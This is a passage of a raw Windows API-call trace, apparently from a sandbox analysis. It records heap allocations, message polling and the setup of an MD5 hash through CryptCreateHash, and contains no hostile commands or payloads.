lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0140.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.809] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.809] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0140.809] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0140.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0140.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0140.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.810] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0140.810] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0140.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0140.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0140.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0140.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0140.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0140.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0140.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0140.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ed8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.815] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0140.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0140.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0140.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.817] 